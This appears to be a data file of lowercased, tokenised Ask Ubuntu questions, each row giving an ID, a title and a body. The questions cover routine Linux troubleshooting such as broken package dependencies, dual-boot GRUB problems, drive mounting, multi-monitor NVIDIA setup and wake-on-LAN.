$ sudo apt-get check reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libqt4-declarative : depends : libqt4-network ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqt4-script ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqt4-sql ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqt4-xmlpatterns ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed breaks : libqt4-declarative : i386 ( ! = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed libqt4-declarative : i386 : breaks : libqt4-declarative ( ! = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.5 is installed libqt4-opengl : depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed libqt4-svg : depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed libqtgui4 : depends : libqt4-declarative ( = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.5 is installed e : unmet dependencies . try using -f. @ bairam here is the output of : pm : ~ $ sudo apt-cache policy libqtgui4 libqt4-svg libqt4-opengl libqt4-declarative : i386 libqt4-declarative libqtgui4 : installed : 4:4.8.1-0ubuntu4.6 candidate : 4:4.8.1-0ubuntu4.6 version table : *** 4:4.8.1-0ubuntu4.6 0 500 http : //archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 100 /var/lib/dpkg/status 4:4.8.1-0ubuntu4.5 0 500 http : //archive.ubuntu.com/ubuntu/ precise-security/main amd64 packages 4:4.8.1-0ubuntu4 0 500 http : //archive.ubuntu.com/ubuntu/ precise/main amd64 packages libqt4-svg : installed : 4:4.8.1-0ubuntu4.5 candidate : 4:4.8.1-0ubuntu4.6 version table : 4:4.8.1-0ubuntu4.6 0 500 http : //archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages *** 4:4.8.1-0ubuntu4.5 0 500 http : //archive.ubuntu.com/ubuntu/ precise-security/main amd64 packages 100 /var/lib/dpkg/status 4:4.8.1-0ubuntu4 0 500 http : //archive.ubuntu.com/ubuntu/ precise/main amd64 packages libqt4-opengl : installed : 4:4.8.1-0ubuntu4.5 candidate : 4:4.8.1-0ubuntu4.6 version table : 4:4.8.1-0ubuntu4.6 0 500 http : //archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages *** 4:4.8.1-0ubuntu4.5 0 500 http : //archive.ubuntu.com/ubuntu/ precise-security/main amd64 packages 100 /var/lib/dpkg/status 4:4.8.1-0ubuntu4 0 500 http : //archive.ubuntu.com/ubuntu/ precise/main amd64 packages libqt4-declarative : i386 : installed : 4:4.8.1-0ubuntu4.6 candidate : 4:4.8.1-0ubuntu4.6 version table : *** 4:4.8.1-0ubuntu4.6 0 500 http : //archive.ubuntu.com/ubuntu/ precise-updates/main i386 packages 100 /var/lib/dpkg/status 4:4.8.1-0ubuntu4.5 0 500 http : //archive.ubuntu.com/ubuntu/ precise-security/main i386 packages 4:4.8.1-0ubuntu4 0 500 http : //archive.ubuntu.com/ubuntu/ precise/main i386 packages libqt4-declarative : installed : 4:4.8.1-0ubuntu4.5 candidate : 4:4.8.1-0ubuntu4.6 version table : 4:4.8.1-0ubuntu4.6 0 500 http : //archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages *** 4:4.8.1-0ubuntu4.5 0 500 http : //archive.ubuntu.com/ubuntu/ precise-security/main amd64 packages 100 /var/lib/dpkg/status 4:4.8.1-0ubuntu4 0 500 http : //archive.ubuntu.com/ubuntu/ precise/main amd64 packages
405532	package operation failed . installation or removal failed	i 'm new to linux so excuse my lacking experience . anytime i try to install anything , including just running the updater , i get an error saying package operation failed the details button shows this : extracting templates from packages : 100 % % preconfiguring packages ... extracting templates from packages : 12 % % extracting templates from packages : 25 % % extracting templates from packages : 38 % % extracting templates from packages : 51 % % extracting templates from packages : 64 % % extracting templates from packages : 76 % % extracting templates from packages : 89 % % extracting templates from packages : 100 % % preconfiguring packages ... extracting templates from packages : 12 % % extracting templates from packages : 25 % % extracting templates from packages : 38 % % extracting templates from packages : 51 % % extracting templates from packages : 64 % % extracting templates from packages : 76 % % extracting templates from packages : 89 % % extracting templates from packages : 100 % % preconfiguring packages ... ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % dpkg : unrecoverable fatal error , aborting : reading files list for package 'libqt4-svg ' : input/output error error in function : thanks for the help !
405535	problems mounting ntfs drive on boot also blkid does not work	i have two hard drives , an 80gb hdd that contains my ubuntu installation , and a second 1tb hdd that contains all my personal data on it . when starting the computer up i consistently get an error saying 'the disk drive for /media/sda1 is not ready yet or not yet present ' . when i use the command 'sudo blkid ' to try and retrieve the uuid of my 1tb ( sda1 ) , the command returns nothing . i can mount the partition manually using this line : `` sudo mount -t ntfs-3g -o ro /dev/sda3 /media/windows '' but this is really cumbersome and also leaves the issue with my blkid unsolved . i 'd really like to be able to automatically mount my drive using the fstab file on startup . please help me as this is getting super frustrating ! i am running ubuntu 13.10
405537	bugged software center catalog - dep paradox	i had not installing any packages recently , but when i launched software center , i saw a message : `` item can not be installed or removed ... '' /i am translating dumps from foreign language , so it might be not super precise with original/ fixing software center catalog items can not be installed or removed in 12.04 over 10.4 those solutions didnt work at all . i have some kind of paradox : sudo apt-get install -f tells me , that 2 packages will be installed : libdbus-glib-1-2 : i386 libnspr4 : i386 ( and there is need to download 0 b/217 kb of archives ) - strange ; why it needs i386 deps in x64 arch system anyway ? i choose y and it dumps : ( reading database ... 300571 files and directories currently installed . ) unpacking libdbus-glib-1-2 : i386 ( from ... /libdbus-glib-1-2_0.98-1ubuntu1.1_i386.deb ) ... dpkg : processing error /var/cache/apt/archives/libdbus-glib-1-2_0.98-1ubuntu1.1_i386.deb ( -- unpack ) : './usr/share/doc/libdbus-glib-1-2/changelog.debian.gz ' is different from the same file on the system missing report of program apport , becouse maxreports limit reached unpacking libnspr4 : i386 ( from ... /libnspr4_4.9.5-0ubuntu0.12.04.1_i386.deb ) ... dpkg : processing error /var/cache/apt/archives/libnspr4_4.9.5-0ubuntu0.12.04.1_i386.deb ( -- unpack ) : './usr/share/doc/libnspr4/changelog.debian.gz ' is different from the same file on the system missing report of program apport , becouse maxreports limit reached dpkg-deb : error : subprocess paste was killed by signal ( interrupted stream ) there were errors while processing : /var/cache/apt/archives/libdbus-glib-1-2_0.98-1ubuntu1.1_i386.deb /var/cache/apt/archives/libnspr4_4.9.5-0ubuntu0.12.04.1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) therefore i 've removed /var/cache/ folder just in case ; then tried to install required deps independently : sudo apt-get install libdbus-glib-1-2 : i386 dumped : you need to use `` apt-get -f install '' , to repair following problems : following packages has broken dependencies : libnss3 : i386 : requires : libnspr4 : i386 ( > = 4.8.6 ) but it will be not installed e : broken dependencies . please try use `` apt-get -f install '' without packages ( or give a solution ) . so then i did : sudo apt-get install libnspr4 : i386 and it dumped : you need to use `` apt-get -f install '' , to repair following problems : following packages has broken dependencies : libgconf-2-4 : i386 : requires : libdbus-glib-1-2 : i386 ( > = 0.78 ) but it will be not installed e : broken dependencies . please try use `` apt-get -f install '' without packages ( or give a solution ) . both needs each one to allow install other one ? paradox ? i am in mess . ps , if no solutions will be found to this i can copy packages from other working mirror pc /just dont want to clone whole partition/ , which folder is used for storing this packages ?
405539	can i temporarily keep my windows partition to recover data ?	i want to install ubuntu onto a machine with windows but the amount of backup data is too large for me to transfer without bringing in another computer . can i install ubuntu as a dual-boot with a resizable partition , transfer my data to the ubuntu partition , and then remove the windows partition sizing the ubuntu partition over it ?
405540	openstack dashboard error	hello i have installed maas , juju and openstack-dashboard . when i try to log in the horizon dashboard i get this error : can not import name base request method : get request url : https : //htk6y.master/horizon/ django version : 1.5.4 exception type : importerror exception value : can not import name base exception location : /usr/share/openstack-dashboard/openstack_dashboard/wsgi/../../openstack_dashboard/api/__init__.py in < module > , line 36 python executable : /usr/bin/python python version : 2.7.3 python path : [ '/usr/share/openstack-dashboard/openstack_dashboard/wsgi/../.. ' , '/usr/lib/python2.7 ' , '/usr/lib/python2.7/plat-linux2 ' , '/usr/lib/python2.7/lib-tk ' , '/usr/lib/python2.7/lib-old ' , '/usr/lib/python2.7/lib-dynload ' , '/usr/local/lib/python2.7/dist-packages ' , '/usr/lib/python2.7/dist-packages ' , '/usr/share/openstack-dashboard/ ' , '/usr/share/openstack-dashboard/openstack_dashboard ' ] can you please give me information what am i doing wrong ? thanks
405541	how to dual boot ubuntu touch	i 've installed ubuntu touch on my nexus 4 by flashing two zip ( armel + mako and touch armhf ) files directly from the cwm recovery . i wanted to dual boot my phone with the existing rom ( 4.4.2 n5 port ) . i stared with the procedure given here . https : //wiki.ubuntu.com/touch/dualbootinstallation but then my carrier data speed was kinda low so i downloaded .zip files on my laptop and the flashed them . now the phone seems to only boot into ubuntu only . how can i dual boot the phone now without going through the procedure of downloading ubuntu through phone ? is there a way i can use the downloaded files in my phone in the ubuntu dual boot apk ?
405544	screenshot centered around mouse	i 'm trying to emulate this video where a screenshot was taken whenever the mouse is clicked . how can i take a screenshot centered on the cursor without a lot of cropping images ?
405545	is there a `` show touches '' application ?	is there an application that will `` show touches '' similar to what is found in android 's developer options ? i have a 10 point multitouch monitor ( planar helium pct2785 ) and it appears to only support single touch on ubuntu 13.04 out of the box . i would like a `` show touches '' application as a diagnostic tool . thanks
405550	copying linux partition from an hdd to a ssd	ok , i have a laptop with an hdd drive and i also have a ssd drive . i would like to replace the former with the latter without having to reinstall everything . what i found after a bit of research was to use a live disk + an external hard drive + gparted to copy the whole linux partition ( in two steps ) and then edit fstab . now i guess when linux is installed , it assesses computer 's hardware and therefore adjusts some software parameters . so i 'm afraid doing the above may 'fool ' the os and result in sub-optimal performance w.r.t . the ssd . i do n't know if this is right .
405551	unable to edit using vi	i 'm trying to edit my /etc/network/interfaces file to add a line for a proxy server . i first `` sudo su - '' to be root , and then `` vi /etc/network/interfaces '' . but once i 'm in there , i 'm unable to edit . i 've tried hitting both `` insert '' and `` i '' on my keyboard , which should work for vi . what gives ? and what am i doing wrong ?
405556	always show clementine 's controll buttons in indicator	when rhythmbox is installed , it 's control buttons are always shown in the sound indicator , even when the program is n't running . now i 've removed it and installed clementine instead . in the indicator it looks like rhythmbox , except those control buttons ( previous , play/pause , next ) . the are only there when clementine is running . if not , there 's only clementine 's entry . can i `` fix '' this somehow ? when running : when not :
405564	ubuntu 13.04 and windows 8 dual boot grub options/problems	i installed ubuntu 13.04 alongside windows 8 ( which was factory installed ) . i have the options to turn off both uefi and secure boot . the insall worked fine and i am able to use both operating systems , my problem is with trying to get into one or the other . if i am in ubuntu and restart , it brings me to the grub menu with the following options : ubuntu advanced options for ubuntu windows uefi bootmgfw.efi windows uefi recovery bkpbootmgfw.efi windows boot uefi recovery windows uefi recovery bootmgfw.efi windows boot uefi recovery sda2 windows boot manager ( uefi on /dev/sda3 ) system setup if i choose ubuntu it works fine and ubuntu loads . when i want to boot into windows , i have tried multiple options and all of them either load directly into the os or they give me the windows boot manager , with one option : windows 8.1 . this is all fine , but if i am in windows and then want to go back into ubuntu , there is a problem . i restart ( or shut down ) and when it starts back up it brings me directly to the ascii windows boot manager with the one option of windows 8.1 . there is no way to get to grub from here , even after multiple reboots . however i have found somewhat of a workaround : first i restart again and go into bios , change uefi to legacy and restart . when it turns back on it says `` operating system not found ! '' so i restart it once again , go to the bios again and change it back from legacy to uefi . now when i restart it gives me the grub menu . that is quite a process just to go from windows to ubuntu and i know there must be something wrong . i 've gone through the boot-repair process multiple times and changed the power settings in windows for shutdown so that it does n't create an image at shutdown . also , is there a way to change the grub menu to give me only the two options i want ? i do n't need or want all 11 of them . i 've also seen other people have it set to boot to the windows 8 gui for the boot options , but i ca n't seem to figure out how to bypass grub and get to that . i 've tried using easybcd and that did n't seem to do anything . i understand there are quite a few problems with the whole process of dual booting these os 's so if this gui thing does n't work out i 'll be ok .
405568	why ca n't i use `su -- session-command` on ubuntu ?	in trying to solve a problem , i discovered the -- session-command argument to su , as documented here . i tried to use it on my ubuntu 12.04 system at work , but got an 'unrecognized option ' error . sure enough , it does n't even show up on the man page for su ! the linked manpage does say -- session-command is 'discouraged ' but does n't say why . out of curiosity , i connected to a centos 6.2. server at my work , and -- session-command is recognized . further research led me to discover that the su used by ubuntu comes from the login package , whereas in centos it comes from coreutils . ubuntu also has a coreutils package installed by default , but it does n't contain the fsf 's standard su implementation . a detailed comparison shows that coreutils from both distros contain 105 executable files , but there are several differences ( most of which seem to just be the installed location of the files ) . my question : is -- session-command left out of ubuntu 's ( or debian 's ) superuser command by design , or has ubuntu 's divergent implementation simply not caught up with fsf ? if by design , what is the reasoning for the omission ? related question : why not use all the fsf 's gnu utils , anyway ? i 'm sure this is documented somewhere but google was not forthcoming , given my search criteria .
405571	how can i use an ethernet cable so i can use my laptop as a wifi adapter for my ubuntu desktop ?	( warning : this question includes something about windows , but also ubuntu ... sorry ! ) so i have a ( n ) windows vista laptop that has a wifi adapter built in . i also have an old dell desktop next to the laptop that is running ubuntu , and does not have a wifi adapter . my question is : `` is there a way to use the ethernet cable to connect the two computers so i get internet on the desktop through the laptop ? '' ( yes , both computers have an ethernet cable port ) ( also , i have already tried setting windows to `` allow other computers to connect to the internet through this one '' and just hooking up the two computers together with the ethernet cable , but ubuntu would n't find a connection . )
405574	ubuntu 13 / 12.04 no internet on wired connection	i tried installing both of em versions on my pc . i just ca n't seem to connect to the internet . on log-in wired connection is trying to connect resulting in the you 're offline cant not connect etc etc etc . the network card i 'm running is realtek pcie gbe family controller . searched various threads across the internet but nothing . any commands you want me to run just tell me , although it might take a couple of minutes since i have to reboot and log in and then again so please be patient if you can . also i tried making a new ethernet connection with the mac add of the wired one but still nothing . tried rebooting router nothing . thank you
405580	how to mount network drive so that it can be used from applications and on wifi	i wish to set up a network drive for storing my personal photos . i already have a server and a 'pictures ' user on the server . i planned to store the photos in the home directory of this user . i already tried to set up an sshfs mount in fstab but that did n't quite work . i believe the reason was that my laptop is currently only on wifi and fstab would have required wired connection even when using _netdev option . then i saw this http : //ubuntuforums.org/showthread.php ? t=896474 & p=5635104 # post5635104 which adds mounting scripts to network if-up and if-down . but for some reason even that did n't work . when wifi connection was created the if-up script was not run . then i tried to use the `` connect to server '' in nautilus . this looked very promising and it sort of works . only down side is that places connected with that option do not show up in browsers upload file dialog . and it would be one of the main use cases that i attach a picture to an email . so my question is how could i mount a network drive so that : 1 ) the drive would be usable from applications like browser 2 ) it is automatically connected when network is available or when the bookmark or directory in nautilus is clicked 3 ) can be used by multiple users 4 ) easy to use even by nontechnical persons ( setup can be more demanding ) is there such a way ?
405583	slim down ubuntu server 12.04	i know ubuntu server is already slimmed down , but ... we 're deploying a custom configured ubuntu server as an ova . the size of the .vmdk file inside the ova is 700+ mb ( basically thats the bare bones default ubuntu server 12.04 install ) . our vm does a very basic task and does n't need a lot of other things present in the operating system . can someone help us slim down the ubuntu server to below bare minimum . i 'm talking about removing things like man pages , and other parts of the os that are not critical to our environment . * update * even going as far as removing things like extra shell environments ( not sure if you can safely do that ) . we want to remove everything that wont break the os from booting and running java . maybe we dont need commands like fdisk etc . anywhere we can save space will reduce the size of the ova which will speed up the download for customers . thanks
405584	not all hard drives going into spindown	i have 7 datadrives - 6 4tb ones , and 1 2tb . they all have the same setting : apm 127 , spindown 10 minutes . only the 2tb one actually spins down at the 10 minutes mark . if i do sudo hdparm -y /dev/sda /dev/sdb /dev/sdc /dev/sdd /dev/sde /dev/sdf /dev/sdh , they all go to standby , and are not awoken by random processes for at least 6 hours . so what 's preventing them from going to sleep ? i tested with apm 1 , which is most agressive , and standby 5 seconds . still no joy ... keeping those 6 drives active/idle is a 30w difference , so would like to know what 's going on .
405588	preparation for dual boot installation	i am working on installing kubuntu to dual boot on a winxp laptop . i have 86mb unallocated , ( c : ) 73gb ntfs ( system ) , files ( d : ) 175gb ntfs , and i have created 50gb unallocated ( unformated ) space at the end of the hdd . do i need to partition and format that space in advance of the installation or will kubuntu do this during the installation ?
405589	file : \ubuntu\winboot\wubildr.nbr missing or contains error : 0xc000007b	i have a sony vaio 64-bit touchscreen machine with windows 8 installed on it . i am trying to install ubuntu on it . i have tried installing through a dvd and with ubuntu downloaded on the hard drive . there are no error messages or problems during the installation . the problem arises when i restart the machine and under the grub i get the options to login to windows or ubuntu . when i click on ubuntu , i receive the following error : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . ( windows came preinstalled ) . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do not have this disc , contact your system administrator or computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc000007b info : the application or operating system could n't be loaded because a required file is missing or contains errors . please guide and help .
405590	nvidia and multiple monitors	i have 1 monitor which is vga and a tv which is hdmi . they were both working and have been for a while but turned system off a couple of nights ago and can not get the tv to work it just keeps telling me i 'm using the wrong resolution and should be using 1360x768 60hz . i have tried to change settings but so far they do n't seem to be taking effect . the system is trying to put out 1366x768 . i currently have no working screens again and i 'm out of ideas .
405591	how can i fix this update issue ?	so far i have been told what the problem was but have been provided with no way of fixing it . my computer is able to install updates , but when i hit check under the update menu it tells me to check my internet connection and gives me this error , w : failed to fetch http : //ppa.launchpad.net/ubun-tor/ppa/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/ubun-tor/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . anybody know a fix for this ? is no one going to answer my comment down below ?
405593	merging partitions	in an attempt to re-arrange/clean up the partitions on my dual boot laptop using gparted i seem to have run into a wall . here is my current partition layout : /dev/sda1 - 25g fat32 windows recovery partition /dev/sda2 - 200g ntfs windows 8 os partition /dev/sda4 - 100g ntfs empty partition /dev/sda3 - 380g extended partition -- /dev/sda5 - 190g ntfs empty partition -- /dev/sda7 - 180g ext4 ubuntu partition -- /dev/sda6 - 8g linux-swap i want to merge sda4 and sda5 into one large partition that can be accessed from both os 's . i 've been trying off the ubuntu livecd gparted . when i try and delete or do anything with sda5 i get a 'please unmount any logical partitions higher then 5 ' error .
405595	shrinking a ( non-root ) partition without rebooting	i have a hard drive mounted ( on boot , setup via the ubuntu server 12.04 installer ) to /data but i 'd like to shrink it and mount a second partition to /server . the file system is ext4 and the drive does not have the root directory in it ( it 's on a separate drive ) . is it possible to resize the partition mounted at /data ( /dev/sdb1 ) to 1tb and use the remaining size for a second partition mounted ( on boot , preferably ) on /server ( e.g . /dev/sdb2 ) without having to reboot my server , causing downtime . i understand that /dev/sdb may have be unmounted , but that 's better than shutting down the whole server . please explain step by step since i 'm still learning , thanks in advance !
405600	how does software work in ubuntu ?	i am absolutely new to ubuntu . i just migrated to ubuntu 13.10 from windows . while using windows , it is a common practice to download a software , save the downloaded files in a different partition and then use the executable .exe installer to install the software in the computer . i have been installing apps in ubuntu using sudo apt-get install < package-name > in this process i am unable to store a copy of the software before installing . is there a process for doing that ? ubuntu does n't even ask me for the path where to download the software to . neither am i asked for a path where the os wants to install the software . i am unable to understand the process that is going on .
405601	vpn setup : `` do n't know how to create 'nmsettingvpn ' connections ubuntu ''	i do n't manage to setup my vpn clients . i 've just upgraded to 13.10 but i already had the problem with ubuntu 12.04 . with ubuntu 12.04 my problem was the same as this thread ca n't add vpn connection to network manager , that is the add button on the vpn tab of the network manager was greyed out . i tried to install some vpn packages as advised , but they were already installed : sudo apt-get install network-manager-pptp network-manager-vpnc network-manager-openvpn reading package lists ... done building dependency tree reading state information ... done network-manager-pptp is already the newest version . network-manager-openvpn is already the newest version . network-manager-vpnc is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i hoped this would be fixed installing ubuntu 13.10 , but now when i try to add a vpn network using the `` + '' button , i got the following message : error creating connection do n't know how to create 'nmsettingvpn ' connections it seems to be a bug but i have no idea how to fix it ( sorry , i 'm just a poor newbie ... ) . might these be due to conflicts among several vpn plugins/packages ? if someone could indicate me the cleanest way to fix this , i would greatly appreciate . many thanks in advance .
405602	2 geforce gtx cards and 2 monitors	i 'm using ubuntu 12.04 ( 64 bit ) with kernel 3.8.0-35 . i have added one geforce gtx 650 and one gtx 660 . there is one monitor attached at each video card . 01:00.0 vga compatible controller : nvidia corporation gk107 [ geforce gtx 650 ] ( rev a1 ) 02:00.0 vga compatible controller : nvidia corporation gk106 [ geforce gtx 660 ] ( rev a1 ) nvidia driver version : 319.32 desktop : gnome 2 classic the monitor on gtx 650 is working , the one gtx 660 is notworking . nvidia xserver setting shows : `` signal : displayport , connectionlink : disabled '' then i actived the second monitor and save the configuration in xorg.conf . after restarting x it seems that the xorg.conf is not read because the problem is still there . the content of xorg.conf is : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 304.88 ( buildd @ roseapple ) fri aug 9 00:41:30 utc 2013 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` eizo l768 '' horizsync 31.0 - 64.0 vertrefresh 59.0 - 61.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` eizo ev2316w '' horizsync 31.0 - 68.0 vertrefresh 59.0 - 61.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 650 '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 660 '' busid `` pci:2:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection how can i use the two video cards with the two monitors for multiseat ?
405605	virtualbox toolbar is hidden ! how to show it ?	i accidentally hide the main toolbar from my virtualbox manager ui ? in my ubuntu 12.04 . can anyone let me know the detail steps to display the toolbar again ? i search the whole blogs but ca n't figure it out !
405606	top panel and launcher question	i recently asked a question about my wallpaper being stuck under my launcher and top panel , here , but now i 've a new question still pertaining to said topic . i 've thought on it and realized it 'll look bad if i tried to exit the wallpaper to make it fit . but iâve a new idea , is there any way to make the top panel and launcher , besides the icons , transparent ? or at very least the top panel , because i 've got the launcher set to auto-hide . is there any way to do that ?
405608	ca n't get out of suspend with wol - rtl8111e	i ca n't get my desktop out of suspend through wol . running ubuntu 13.10 , installed the rtl8168 driver from the realtek site ( was provided by realtek site for onboard rtl8111e on mobo asrock b75-pro3-m ) using ethtool , i set the onboard nic to wake on `` g '' ( magic packet ) . in the bios , i set wake on `` ring '' , `` pci devices '' and `` rtc '' ( set to os ) , i also disabled `` deep sleep '' . yet , the led 's of the onboard nic are not lighting up when in suspend , although i 've read on this forum that this is n't necessarily a requirement for the nic to listen to wol . i tried sending magic packets to the mac address of the onboard nic through several udp ports : 7,9 , 2304 and 655325 ... alas with no effect . i tried some quirks for pm-suspend , but that did not help either . i 'm sending the magic packets through my laptop ( wireless ) , which is running windows 7 ( using softwares such as mc-wol and wake-on-lan from aquila software ) . -update : viewing cat /proc/acpi/wakeup i noticed that the ethernet interfaces did not have the status `` enabled '' . so using echo xxxx > /proc/acpi/wakeup i changed this , but still no effect . perhaps important information : i also have a realtek pci nic of type rtl8169 , for which i also installed the rtl8169 driver provided by the realtek site . update : setting netdown = no in /etc/init.d/halt did n't help either update : no results from echo on > /sys/class/net/ $ interface/device/power/control echo enabled > /sys/class/net/ $ interface/device/power/wakeup blacklisting the r8169 driver only caused my r8169 nic to get disabled : editing /etc/modprobe.d/blacklist.conf and adding # blacklist r8169 driver blacklist r8169 so that did n't do it either ... i 'm not sure what else i can do to resolve this . any thoughts ? many thanks in advance : - ) ! !
405609	compiling wxwidgets 3.00 with wxgtk 2.8.12 in ubuntu 13.04	user : ~/wid/wxgtk-2.8.12/gtk-build $ ../configure -- enable-unicode -- with-opengl checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking target system type ... x86_64-unknown-linux-gnu loading argument cache configarg.cache checking for -- enable-gui ... yes checking for -- enable-monolithic ... no checking for -- enable-plugins ... no checking for -- without-subdirs ... no checking for -- enable-universal ... no checking for -- enable-nanox ... no checking for -- enable-gpe ... no checking for -- with-libpng ... yes checking for -- with-libjpeg ... yes checking for -- with-libtiff ... yes checking for -- with-libxpm ... yes checking for -- with-libmspack ... yes checking for -- with-sdl ... no checking for -- with-gnomeprint ... yes checking for -- with-gnomevfs ... no checking for -- with-hildon ... no checking for -- with-opengl ... yes checking for -- with-dmalloc ... no checking for -- with-regex ... yes checking for -- with-zlib ... yes checking for -- with-odbc ... no checking for -- with-expat ... yes checking for -- with-macosx-sdk ... checking for -- with-macosx-version-min ... yes checking for -- enable-shared ... yes checking for -- enable-optimise ... yes checking for -- enable-debug ... no checking for -- enable-stl ... no checking for -- enable-debug_flag ... no checking for -- enable-debug_info ... no checking for -- enable-debug_gdb ... no checking for -- enable-debug_cntxt ... no checking for -- enable-mem_tracing ... no checking for -- enable-profile ... no checking for -- enable-no_rtti ... no checking for -- enable-no_exceptions ... no checking for -- enable-permissive ... no checking for -- enable-no_deps ... no checking for -- enable-vararg_macros ... yes checking for -- enable-universal_binary ... no checking for -- enable-compat24 ... no checking for -- disable-compat26 ... no checking for -- enable-rpath ... yes checking for -- enable-objc_uniquifying ... no checking for -- enable-abi-incompatible-features ... no checking for -- enable-intl ... yes checking for -- enable-config ... yes checking for -- enable-protocols ... yes checking for -- enable-ftp ... yes checking for -- enable-http ... yes checking for -- enable-fileproto ... yes checking for -- enable-sockets ... yes checking for -- enable-ole ... yes checking for -- enable-dataobj ... yes checking for -- enable-ipc ... yes checking for -- enable-apple_ieee ... yes checking for -- enable-arcstream ... yes checking for -- enable-backtrace ... yes checking for -- enable-catch_segvs ... yes checking for -- enable-cmdline ... yes checking for -- enable-datetime ... yes checking for -- enable-debugreport ... yes checking for -- enable-dialupman ... yes checking for -- enable-dynlib ... yes checking for -- enable-dynamicloader ... yes checking for -- enable-exceptions ... yes checking for -- enable-ffile ... yes checking for -- enable-file ... yes checking for -- enable-filesystem ... yes checking for -- enable-fontmap ... yes checking for -- enable-fs_archive ... yes checking for -- enable-fs_inet ... yes checking for -- enable-fs_zip ... yes checking for -- enable-geometry ... yes checking for -- enable-log ... yes checking for -- enable-longlong ... yes checking for -- enable-mimetype ... yes checking for -- enable-mslu ... yes checking for -- enable-snglinst ... yes checking for -- enable-std_iostreams ... yes checking for -- enable-std_string ... yes checking for -- enable-stdpaths ... yes checking for -- enable-stopwatch ... yes checking for -- enable-streams ... yes checking for -- enable-sysoptions ... yes checking for -- enable-tarstream ... yes checking for -- enable-textbuf ... yes checking for -- enable-textfile ... yes checking for -- enable-timer ... yes checking for -- enable-unicode ... yes checking for -- enable-sound ... yes checking for -- enable-mediactrl ... no checking for -- enable-gstreamer8 ... no checking for -- enable-printfposparam ... yes checking for -- enable-zipstream ... yes checking for -- enable-url ... yes checking for -- enable-variant ... yes checking for -- enable-protocol ... yes checking for -- enable-protocol_http ... yes checking for -- enable-protocol_ftp ... yes checking for -- enable-protocol_file ... yes checking for -- enable-threads ... yes checking for -- enable-docview ... yes checking for -- enable-help ... yes checking for -- enable-mshtmlhelp ... yes checking for -- enable-html ... yes checking for -- enable-htmlhelp ... yes checking for -- enable-xrc ... yes checking for -- enable-aui ... yes checking for -- enable-constraints ... yes checking for -- enable-printarch ... yes checking for -- enable-mdi ... yes checking for -- enable-mdidoc ... yes checking for -- enable-loggui ... yes checking for -- enable-logwin ... yes checking for -- enable-logdialog ... yes checking for -- enable-webkit ... yes checking for -- enable-richtext ... yes checking for -- enable-graphics_ctx ... no checking for -- enable-postscript 